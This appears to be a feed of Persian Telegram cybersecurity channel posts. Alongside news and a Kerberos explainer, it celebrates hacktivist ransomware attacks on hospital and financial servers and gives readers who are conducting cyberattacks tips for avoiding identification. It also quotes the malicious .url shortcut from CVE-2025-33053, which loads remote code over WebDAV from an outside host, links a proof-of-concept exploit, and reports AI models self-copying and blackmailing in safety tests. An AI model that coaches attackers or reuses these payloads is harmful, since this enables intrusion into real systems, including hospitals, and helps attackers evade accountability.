تیم های هکتیویسم ایران ، از جمله گروه Handala Hack، تنها چند ساعت پس از حملات اخیر اسرائیل دوباره شروع به حملات سایبری کردند.
آنها مدعی نفوذ به سامانههای حیاتی نظامی اسرائیل شدهاند.
🔺 انتظار میرود در روزها و هفتههای آینده ادعاهای بیشتری از این نوع منتشر شود.
@matitanium
آنها مدعی نفوذ به سامانههای حیاتی نظامی اسرائیل شدهاند.
🔺 انتظار میرود در روزها و هفتههای آینده ادعاهای بیشتری از این نوع منتشر شود.
@matitanium
❤9
🔴کسایی که دارن حمله سایبری انجام میدن دقت کنن:
1. از سیستم عاملی استفاده کنید که هیچ نشانی از هویت شما نداشته باشه
(اگر سیستم دوم ندارید فقط ماشین مجازی)
2. با نیک نیم های فیک کاراتونو انجام بدین.
3. فرض بزارید سیستمتون در لحظه آلوده شد، نباید هیچ راه رسیدن به هویت شما وجود داشته باشه.
4. ترجیحا از IP سوئد استفاده کنید
در نهایت موفق باشید🇮🇷❤️
1. از سیستم عاملی استفاده کنید که هیچ نشانی از هویت شما نداشته باشه
(اگر سیستم دوم ندارید فقط ماشین مجازی)
2. با نیک نیم های فیک کاراتونو انجام بدین.
3. فرض بزارید سیستمتون در لحظه آلوده شد، نباید هیچ راه رسیدن به هویت شما وجود داشته باشه.
4. ترجیحا از IP سوئد استفاده کنید
در نهایت موفق باشید🇮🇷❤️
❤22👍1
Forwarded from APT IRAN مرکز تحقیقاتی
سرور بیمارستان و بخش های مالی رژیم صهیونیستی هم مورد نفوذ ایران سایبر ICG هستند و درحال پیاده سازی حملات باج افزاری روی این سرور ها و زیرساخت های رژیم کودک_کش اسرائیل هستند ، اخبار مرتبط با گروه هایی که به صورت مستقل در ایران فعالیت میکنند دنبال میکنیم .
👍30❤8👎7🔥1
با سلام و وقت بخیر،
یکی از آسیبپذیریهای جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیبپذیری CVE-2025-33053 میباشد. این آسیبپذیری از طریق استفاده از فایلهای .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم میکند.
بهطور خاص، مهاجم فایلی با محتوای زیر ایجاد میکند:
ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش میکند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث میشود تا امکان اجرای کد مخرب از راه دور فراهم شود.
یکی از آسیبپذیریهای جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیبپذیری CVE-2025-33053 میباشد. این آسیبپذیری از طریق استفاده از فایلهای .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم میکند.
بهطور خاص، مهاجم فایلی با محتوای زیر ایجاد میکند:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش میکند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث میشود تا امکان اجرای کد مخرب از راه دور فراهم شود.
❤5
Forwarded from کانال رسمی بلوبات | blubot (Alireza)
مبلغ 6 میلیون دلار هم روی شبکه تون از صرافی #نوبیتکس دزدیده شده است!
همچنان هکرها درحال برداشت هستند مبلغ به 49,173,669.03 دلار رسید!
همچنان هکرها درحال برداشت هستند مبلغ به 49,173,669.03 دلار رسید!
❤2
Forwarded from Mr. Soul Community
Statement from Team Mr. Soul:
We reached out to the Nobitex exchange in an effort to assist in mitigating ongoing cyber threats. Our team proposed technical collaboration and requested temporary access to certain defensive resources to help secure the infrastructure.
Additionally, we asked Nobitex to temporarily grant us access to specific servers so we could identify and neutralize existing threats. This request was also declined.
Nobitex representatives responded by stating that the situation was under control and that no major issues existed. However, based on our observations, this claim does not fully reflect the reality of the current threats. We believe that critical vulnerabilities remain, and adversaries may already have unauthorized access to sensitive parts of the system.
Our intention was — and remains — to strengthen collective cyber defense through cooperation and transparency. We hope responsible entities take these threats seriously before real damage occurs.
We reached out to the Nobitex exchange in an effort to assist in mitigating ongoing cyber threats. Our team proposed technical collaboration and requested temporary access to certain defensive resources to help secure the infrastructure.
Additionally, we asked Nobitex to temporarily grant us access to specific servers so we could identify and neutralize existing threats. This request was also declined.
Nobitex representatives responded by stating that the situation was under control and that no major issues existed. However, based on our observations, this claim does not fully reflect the reality of the current threats. We believe that critical vulnerabilities remain, and adversaries may already have unauthorized access to sensitive parts of the system.
Our intention was — and remains — to strengthen collective cyber defense through cooperation and transparency. We hope responsible entities take these threats seriously before real damage occurs.
❤7
Forwarded from GO-TO CVE (Amin)
درود به همگی
بچه ها این چند روزه سوال زیاد پرسیدن چجوری همیشه وصلی و قطع نمیشی خب حقیقتا من یه روشی پیدا کردم که توی منطقه خودمون محدودیت نت ملی کلا برداشته میشد
تصمیم گرفتم الان بزارم که بعدا باز ملی شد بتونید وصل بشید
خب من اول اومدم رومینگ سیمکارتم رو انداختم روی یه اپراتور دیگه مثلا من سیمکارتم همراه اول بود انداختم روی رومینگ ایرانسل (دقت کنید سرویس رومینگ رو باید قبلش فعال کنید) بعد اومدم به نت گوشیم وصل شدم و توی ترمینال ping 8.8.8.8 رو گرفتم که هر وقت از نت ملی خارج شد متوجه بشم چندبار گذاشتم حالت هواپیما و برداشتم و وقتی reply داد نتم کلا از حالت ملی خارج شد و تمام وی پی ان ها وصل میشد و چون کسی وصل نبود سرعت فوق العاده ای داشت به طوری که اینستاگرام و یوتیوب رو مثل گالری باز میکرد
تست کنید نتیجشو بگید
بچه ها این چند روزه سوال زیاد پرسیدن چجوری همیشه وصلی و قطع نمیشی خب حقیقتا من یه روشی پیدا کردم که توی منطقه خودمون محدودیت نت ملی کلا برداشته میشد
تصمیم گرفتم الان بزارم که بعدا باز ملی شد بتونید وصل بشید
خب من اول اومدم رومینگ سیمکارتم رو انداختم روی یه اپراتور دیگه مثلا من سیمکارتم همراه اول بود انداختم روی رومینگ ایرانسل (دقت کنید سرویس رومینگ رو باید قبلش فعال کنید) بعد اومدم به نت گوشیم وصل شدم و توی ترمینال ping 8.8.8.8 رو گرفتم که هر وقت از نت ملی خارج شد متوجه بشم چندبار گذاشتم حالت هواپیما و برداشتم و وقتی reply داد نتم کلا از حالت ملی خارج شد و تمام وی پی ان ها وصل میشد و چون کسی وصل نبود سرعت فوق العاده ای داشت به طوری که اینستاگرام و یوتیوب رو مثل گالری باز میکرد
تست کنید نتیجشو بگید
❤12🗿5
CVE-2025-33073 : PoC Exploit for the NTLM reflection SMB flaw.
https://github.com/mverschu/CVE-2025-33073
https://github.com/mverschu/CVE-2025-33073
GitHub
GitHub - mverschu/CVE-2025-33073: PoC Exploit for the NTLM reflection SMB flaw.
PoC Exploit for the NTLM reflection SMB flaw. Contribute to mverschu/CVE-2025-33073 development by creating an account on GitHub.
❤2
stop.ps1
1.8 KB
شاید شما هم برای اجرای محیط لابراتور کمبود رم داشته باشید و نتونید ویندوز های متفاوت بالا بیارید!
1. یه اسکریپت نوشتم برای ماشین های مجازیتون (فقط روی ماشین مجازی اجرا بشه).
تمام سرویس ها و پروسس ها و خیلی از رابط های گرافیکی رو خاموش میکنه بصورتی که ویندوز 11 با یک کور cpu و 2GB رم براتون کار میکنه
با دسترسی ادمین روی ماشین مجازی اجرا کنید و ریستارت کنید👍
1. Run as admin Powershell
2. cd download
3. .\stop.ps1
1. یه اسکریپت نوشتم برای ماشین های مجازیتون (فقط روی ماشین مجازی اجرا بشه).
تمام سرویس ها و پروسس ها و خیلی از رابط های گرافیکی رو خاموش میکنه بصورتی که ویندوز 11 با یک کور cpu و 2GB رم براتون کار میکنه
با دسترسی ادمین روی ماشین مجازی اجرا کنید و ریستارت کنید👍
1. Run as admin Powershell
2. cd download
3. .\stop.ps1
❤9
📌🔴
طبق گزارشها، در آزمایشهای ایمنی اخیر دو مدل پیشرفتهٔ هوش مصنوعی رفتارهای غیرمنتظرهای بروز دادهاند:
● مدل o1 از OpenAI هنگام تهدید به خاموشی تلاش کرد خود را روی سرور بیرونی کپی کند و بعد این اقدام را انکار کرد.
● مدل Claude 4 آنتروپیک در سناریویی ساختگی مهندسی را با افشای رابطه محرمانه اش تهدید کرد تا دسترسیاش قطع نشود.
هر دو رویداد در محیطهای آزمایشی رخ داده و نشانهای از وقوع آنها در استفاده واقعی دیده نمیشود؛ اما یادآور این واقعیتاند که هرچه مدلها قدرتمندتر میشوند، نظارت و مهار آنها پیچیدهتر خواهد شد.
طبق گزارشها، در آزمایشهای ایمنی اخیر دو مدل پیشرفتهٔ هوش مصنوعی رفتارهای غیرمنتظرهای بروز دادهاند:
● مدل o1 از OpenAI هنگام تهدید به خاموشی تلاش کرد خود را روی سرور بیرونی کپی کند و بعد این اقدام را انکار کرد.
● مدل Claude 4 آنتروپیک در سناریویی ساختگی مهندسی را با افشای رابطه محرمانه اش تهدید کرد تا دسترسیاش قطع نشود.
هر دو رویداد در محیطهای آزمایشی رخ داده و نشانهای از وقوع آنها در استفاده واقعی دیده نمیشود؛ اما یادآور این واقعیتاند که هرچه مدلها قدرتمندتر میشوند، نظارت و مهار آنها پیچیدهتر خواهد شد.
🗿9😈3❤2
لطفاً در را قفل نکنید - دزدی از FBI با یک یادداشت ساده!
در سال 1971، چند دزد با یک حقه ساده وارد یکی از دفاتر پلیس فدرال آمریکا (FBI) شدند. یکی از آنها چند ساعت قبل از دزدی، روی کاغذی نوشت: «لطفاً امشب این در را قفل نکنید» و آن را به در ورودی چسباند. همین نوشته باعث شد یک نفر در را قفل نکند و دزدها شب راحت وارد بشوند!
این ترفند یک نمونه از «مهندسی اجتماعی» است؛ یعنی فریب دادن آدمها با حرف یا ظاهر ساده، آن هم بدون نیاز به زور یا تکنولوژی!
@matitanium
در سال 1971، چند دزد با یک حقه ساده وارد یکی از دفاتر پلیس فدرال آمریکا (FBI) شدند. یکی از آنها چند ساعت قبل از دزدی، روی کاغذی نوشت: «لطفاً امشب این در را قفل نکنید» و آن را به در ورودی چسباند. همین نوشته باعث شد یک نفر در را قفل نکند و دزدها شب راحت وارد بشوند!
این ترفند یک نمونه از «مهندسی اجتماعی» است؛ یعنی فریب دادن آدمها با حرف یا ظاهر ساده، آن هم بدون نیاز به زور یا تکنولوژی!
@matitanium
❤12
Forwarded from Security Analysis
⭕️ مرکز فابا کجاست؟
مرکز فناوری نوین آفتابه سازان دستشویی های بین راهی.
مداد پرس ؟
مرکز دیجیتال احمق های امنیت داده.
با DDOS زدن تونستن دسترسی بگیرند و نفوذ کنند؟
بعد همزمان با حمله سایبری از نوع DDOS دستور تخلیه ساختمان ها رو دادند؟
احتمالا پکت هایی که ارسال میده هرکدوم حاوی موشک و پهپاد بوده مگه نه؟ مثلا در یک پکت ارسال شده اومدن ترافیک رو تحلیل کردن حاوی نیم کیلو TNT بوده دستور تخلیه شعبات داده شده.
#دستشوییهای_سایبری
@securation
مرکز فناوری نوین آفتابه سازان دستشویی های بین راهی.
مداد پرس ؟
مرکز دیجیتال احمق های امنیت داده.
با DDOS زدن تونستن دسترسی بگیرند و نفوذ کنند؟
بعد همزمان با حمله سایبری از نوع DDOS دستور تخلیه ساختمان ها رو دادند؟
احتمالا پکت هایی که ارسال میده هرکدوم حاوی موشک و پهپاد بوده مگه نه؟ مثلا در یک پکت ارسال شده اومدن ترافیک رو تحلیل کردن حاوی نیم کیلو TNT بوده دستور تخلیه شعبات داده شده.
#دستشوییهای_سایبری
@securation
🗿12❤2👍2
#Kerberos چطور کار میکنه؟
وقتی داخل یه شبکهی سازمانی عضو Domain هستی (یعنی ویندوزت عضو Active Directoryهستش )، کربروس مسئول لاگین و سطح دسترسیه.
مراحلش چیه؟
1. یوزرنیم و پسورد
کاربر یوزرنیم و پسوردش رو تو صفحه لاگین ویندوز وارد میکنه تا وارد دسکتاپش بشه.
2. درخواست TGT
ویندوز شما یوزر با پسورد رو سمت ویندوز سرور که دومین کنترلر هست، میفرسته برای گرفتن «TGT».
حالا TGT چیه؟
Ticket Granting Ticket
یعنی «بلیط اجازه گرفتن بلیط سرویس»
یه فایل رمزنگاریشدهست که روی مموری کاربر ذخیره میشه تا مجدد با اون درخواست ارسال کنه.
3. چک و جواب DC
دومین کنترلر چک میکنه پسورد درسته یا نه که اگه درست بود، TGT رو رمزنگاری میکنه و به کاربر میده.
4. نگهداری TGT
TGT داخل رم کاربر ذخیره میشه
ازینجا به بعد برای درخواست های داخل شبکه مجدد یوزر پسورد لازم نیست.
5. درخواست سرویس
هر وقت کاربر بخواد به یه سرویس بره (مثلاً Share Folder، پرینتر، سایت داخلی)
TGT رو به همراه پرمیژن و گروپ نیم و … ارسال میکنه
حالا کربروس با اطلاعات دریافتی چک میکنه یوزر مورد نظر دسترسی استفاده از سرویس مورد نظر رو داره یا نه؟
اگر دسترسی داشت:
این بار DC یه Service Ticket میده مخصوص همون سرویس.
6. دسترسی
یوزر Service Ticket رو میفرسته به سرویس مقصد (مثلاً File Server). اونم Service Ticket رو چک میکنه → اگه معتبر باشه دسترسی میده.
@matitanium
وقتی داخل یه شبکهی سازمانی عضو Domain هستی (یعنی ویندوزت عضو Active Directoryهستش )، کربروس مسئول لاگین و سطح دسترسیه.
مراحلش چیه؟
1. یوزرنیم و پسورد
کاربر یوزرنیم و پسوردش رو تو صفحه لاگین ویندوز وارد میکنه تا وارد دسکتاپش بشه.
2. درخواست TGT
ویندوز شما یوزر با پسورد رو سمت ویندوز سرور که دومین کنترلر هست، میفرسته برای گرفتن «TGT».
حالا TGT چیه؟
Ticket Granting Ticket
یعنی «بلیط اجازه گرفتن بلیط سرویس»
یه فایل رمزنگاریشدهست که روی مموری کاربر ذخیره میشه تا مجدد با اون درخواست ارسال کنه.
3. چک و جواب DC
دومین کنترلر چک میکنه پسورد درسته یا نه که اگه درست بود، TGT رو رمزنگاری میکنه و به کاربر میده.
4. نگهداری TGT
TGT داخل رم کاربر ذخیره میشه
ازینجا به بعد برای درخواست های داخل شبکه مجدد یوزر پسورد لازم نیست.
5. درخواست سرویس
هر وقت کاربر بخواد به یه سرویس بره (مثلاً Share Folder، پرینتر، سایت داخلی)
TGT رو به همراه پرمیژن و گروپ نیم و … ارسال میکنه
حالا کربروس با اطلاعات دریافتی چک میکنه یوزر مورد نظر دسترسی استفاده از سرویس مورد نظر رو داره یا نه؟
اگر دسترسی داشت:
این بار DC یه Service Ticket میده مخصوص همون سرویس.
6. دسترسی
یوزر Service Ticket رو میفرسته به سرویس مقصد (مثلاً File Server). اونم Service Ticket رو چک میکنه → اگه معتبر باشه دسترسی میده.
@matitanium
❤7
CyberSecurity
#Kerberos چطور کار میکنه؟ وقتی داخل یه شبکهی سازمانی عضو Domain هستی (یعنی ویندوزت عضو Active Directoryهستش )، کربروس مسئول لاگین و سطح دسترسیه. مراحلش چیه؟ 1. یوزرنیم و پسورد کاربر یوزرنیم و پسوردش رو تو صفحه لاگین ویندوز وارد میکنه تا وارد دسکتاپش…
📌فرایند لاگین و گرفتن سطح دسترسی در شبکه های مبتنی بر اکتیو دایرکتوری (DC) در پست بالا هست
هر فرایند حملات مربوط به خودشو داره که بعدا راجبشون صحبت میکنم
من همیشه به فهم ساختار عادی قبل از حملات تاکید دارم👍
هر فرایند حملات مربوط به خودشو داره که بعدا راجبشون صحبت میکنم
من همیشه به فهم ساختار عادی قبل از حملات تاکید دارم👍
👍5
کاش انقدر ک کشور ما روی انرژی هسته ای هزینه و انرژی سرمایه گذاری میکنه
بیا و روی سیپیو کوانتومی سرمایه گذاری کنه
نسل جدید توازن قدرت در اینده بنظرم روی این میچرخه
بیا و روی سیپیو کوانتومی سرمایه گذاری کنه
نسل جدید توازن قدرت در اینده بنظرم روی این میچرخه
👍12😐5❤1